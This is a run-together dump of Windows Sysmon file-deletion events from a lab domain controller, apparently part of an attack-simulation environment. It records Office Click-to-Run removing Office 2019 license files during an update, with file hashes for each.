Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-msMD5=4CFEC4CF7E781AF790499CED5335DC36,SHA256=60CBFBE4C4D26757F0E9D8FA851D1EFE5FA7EFA36A5649F36031AE975D3E78AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul.xrm-msMD5=62BAFE0968DE0CA8EBD0030E03CB5A0C,SHA256=924FBF7AA33DEB1D6BCBBB03080632ACB3FC11CB317D0F2FEE5FC75E831E9CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-msMD5=CCC35BEE196C7956428CC8B7F02BFDE5,SHA256=6F3F8ED7E37CCA9655A4234C634089035651CA8DC6FAB595473334E422CE09F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ppd.xrm-msMD5=8F0786FBB81CF2DFB3205BE27AEE7C96,SHA256=C775C728682F41F97FAA046F1BC6FF991336B777618122CBD8FAC5AE1313EDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019VL_MAK_AE-ul-phn.xrm-msMD5=8D6D34E84CB63EFF2F34DEB7F4BCECEA,SHA256=8689ED7D81C2C72993C3450E198591B99AFC105CCA37090B4255ACE54B0E4970,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019VL_MAK_AE-ul-oob.xrm-msMD5=CE9BDE8E19F562F2082521A49074E7D7,SHA256=FC31C0F0F33A9B398EC63469578D470D50A5ABC77EA6665C2F2BBB95325C089A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019VL_MAK_AE-ppd.xrm-msMD5=A924AAC420CA4E6D6F2F8075F99E2248,SHA256=4B170FAE174410699169154F6C907090DBBD55C4A76ED9344C1BEE8382A060E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019VL_MAK_AE-pl.xrm-msMD5=FABB413651689EF518DB590BF8D67F21,SHA256=C2D369DDFF4BAB31FF07EFED44E4034C1DC7F148AC349BAE011DD069DCF14ECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul.xrm-msMD5=9795D582C9F4E42DE07C7FE88257BF67,SHA256=8103024007C02D506DD43363418E1B51F3A35F40F5CA5136843F2B4A49174CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=8794327B5F29AB5870D72D6989CBAD5C,SHA256=DC870F5E5FEE743269A4B2A2041F11070F909D5BC79398162DBFE752E53BCBD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-msMD5=3AE23D14D8942CDBB2CA5DD0628C4149,SHA256=16EE10B6A54AA2CD7E920CC675B86D4FBE75FB7C8525F21FED03AF4667E114C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Trial2-ul-oob.xrm-msMD5=E893B25871FAC9B244C6483374466D07,SHA256=E4D41895108C3965F101002323AD33B7B3162FB95CF04E64D41925281EE89188,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Trial2-ppd.xrm-msMD5=29EB83DE6171CC243310F25269F7AAC4,SHA256=31BB7B8F1BF7CF27441A0851C76D3EE0759995EB99540E6173B474BEC53979AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Trial2-pl.xrm-msMD5=299A078FBB5DD3047C910DC23B88D6BB,SHA256=0623C434BBBD7DD3C730467396578385F4D6510A025689A3570A346630E026AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-msMD5=A5BB510CF2168F953F1F47491A06F066,SHA256=A3965B98A6A9C68E56A5C78387FB53BE66B720AD749DBACC683429A2E97641D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Trial-ppd.xrm-msMD5=056C85E4D5998DD75C8AEE37A6D08E1F,SHA256=6C6BF0B604B6AC74869BFA95C9F38781B1AF8D87FDA846B05CDDF853B88681A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Trial-pl.xrm-msMD5=CA332C0203B121FA33D8F4BC1B1D2CB0,SHA256=9ADBCE29848FB2294C5B348B73088C7C4A1EABD6FCDB36E7CD6BC772B29C394B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Retail-ul-phn.xrm-msMD5=E5A09D5A1F7C165EEFBE43E90F0FAB96,SHA256=92AADBC999DDD4C285640A96FCA98069512FD1840EE39EECA5124824754CF72B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Retail-ul-oob.xrm-msMD5=733129E4E42B6113725A7EA439995658,SHA256=CF6053DE37721FE2AA7500883B7B9739E30F5C2D6565703C7E278B5723C5713C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Retail-ppd.xrm-msMD5=5B57D0D6E4EDD681610774F959817357,SHA256=0620129BCD57A54E1AECB43292B1A1FFF4091E9454FAD109DA51D644C1E7EE3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Retail-pl.xrm-msMD5=6E35C2139F56268F9FCFEC12740051E2,SHA256=32D469A8BFE7C4BCFCA6D5C15983A385EFB6525C58385AFAF912E3430E7AEC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_PrepidBypass-ul-oob.xrm-msMD5=B34132FE4F881E6A62CE6D53F6511380,SHA256=7E991777380A0280ECF5A39AAACFF689CC20B22F2FBEAC64792F3D362CCAAE0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_PrepidBypass-ppd.xrm-msMD5=944C70DBDB659C16F7D8BD0726A5101A,SHA256=B41832CC9DE3B51EAAE5688E55E13740719558AA1D6BD111543EBA69750C97C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp6-ul-phn.xrm-msMD5=8F9D5AEAD79816876D8678BC275ED2BC,SHA256=02CDE247C8BBC35FB1138CE16EA592244F082A9ACBD04982A0F34BAA40794B03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp6-ul-oob.xrm-msMD5=DEFB6343A220ABBB05F76147EBF34E22,SHA256=D70C9CBB823DD47D450680FD5AEB26AA7D1CE8ADA7E620816077331D25C51448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-msMD5=67C43FDB580DC022F2CDF6E1EB167ECF,SHA256=4E303691D95B42B9E6D9F72602FF29D49CE3A5A3157F74BD94ACD0BEE7027739,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-msMD5=884E64FF9A71601177AF0024E036F34E,SHA256=B7D582C27A10D7F22A4FA016E7C25D3484060C7A5CA47AF54BF1A0401B0BE287,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-phn.xrm-msMD5=22FE1863B1C238D6885D4EC145030E5E,SHA256=A1B8975E963E4D21DD4BD62DD300676E8C6C994A291A2637EDBF3BC174B41957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-oob.xrm-msMD5=522AD3C7C7B80D6D70770A26314C58B4,SHA256=53AA24E92AC497B881961775E1955F76967CE100FE1F313BBD5195DB7CFBA0A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp5-ppd.xrm-msMD5=8F2481907E17070D3062632A72119FD3,SHA256=BCDABEDE563864086CC81FE407ABF7F583093911B2840B38D441C2940B050A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp5-pl.xrm-msMD5=55BE3C1BFBED541AA975055184BCD772,SHA256=E0EA9B8E7B25109940D6FBAD7B3AE5251482C437DC6BE93B461E03CB6B88EC35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp4-ul-phn.xrm-msMD5=9CF2A8CEDECC71E70DBF14F07C878591,SHA256=655B486374F90A45A87A85629C52551962561374FB14B9B0A51D1170CCB2B974,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp4-ul-oob.xrm-msMD5=F2A7988007140CC0A432B340C9721781,SHA256=DE34C4C76AD812CF35D0A6CC3205D4E69486EDC61DEAB2743EF213EBD258480E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp4-ppd.xrm-msMD5=801486C8E7D7EB1A53E1B04D41281993,SHA256=F87FE74314A7B98DB2C0A116D8290FE8B94839CB5AF36F28FDB6A182117BCA3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp4-pl.xrm-msMD5=FBF32DDDA3EE940D97E4801CDB45A05A,SHA256=8D163A8FDB864087289F7EEC0C16DE367D6D2716DAF8206D292B00CC5B3C41C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-msMD5=8C84D1E017B40DF8A7A0ED2579D45433,SHA256=451DFACF61235CC2C3C771096CD304F587147CE120F26B581D7CC2265F4FD069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-oob.xrm-msMD5=0347D7592B0B39DCD943CEBBF3419E91,SHA256=EBEBC11D8B7031170A8E3545BE7FD239367D9D9B4C1C18BD99EA7B800FCAF946,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-msMD5=880C711F7D28C0FDD331B16C61F69C9D,SHA256=7A1DF32D5CF2977806E0C0A511221D138B5A7A6F641B2CE63683EBFC9F7724F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp3-pl.xrm-msMD5=592D0D976922689448D850D74F5360AC,SHA256=4E0D52E69F4F3782A191E4D9F596F0714ACD03B20D57780FE3D6A344E3E58D2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-phn.xrm-msMD5=4345D52B32FFD668F95BE51AD28DFC3B,SHA256=E27C44E3F4BF24278CFB49B946BDC1137FEC1628E203944AB5A3916EAC10A0C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-oob.xrm-msMD5=38946D47A23E72C2FC4646C42D1CBE2E,SHA256=C23B8711423CA0CE605FAB9E0251DCB22E3C2FD88B23A9F43E318784BED48CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp2-ppd.xrm-msMD5=3A84CC917F033890F3C150609CA33E03,SHA256=27CA30C61D1D14BABDA9423D32B2357248060AE94332DD5C9466493C87A0112E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp2-pl.xrm-msMD5=DC6E5D22CA772B6249231E0174163BB0,SHA256=D9E4C01BA942B75446DCA0F1291A8FB1E87B1CA3DCE8DDDF92DCE510405D9A55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp-ul-phn.xrm-msMD5=49E52A743677C41AD338C318688DEF84,SHA256=BEFF1100A9F953E4D3B24BE4497E8090F69B2C998E33153153694E684B331F0E,IMPHASH=00000000000000000000000000000000falsetrue 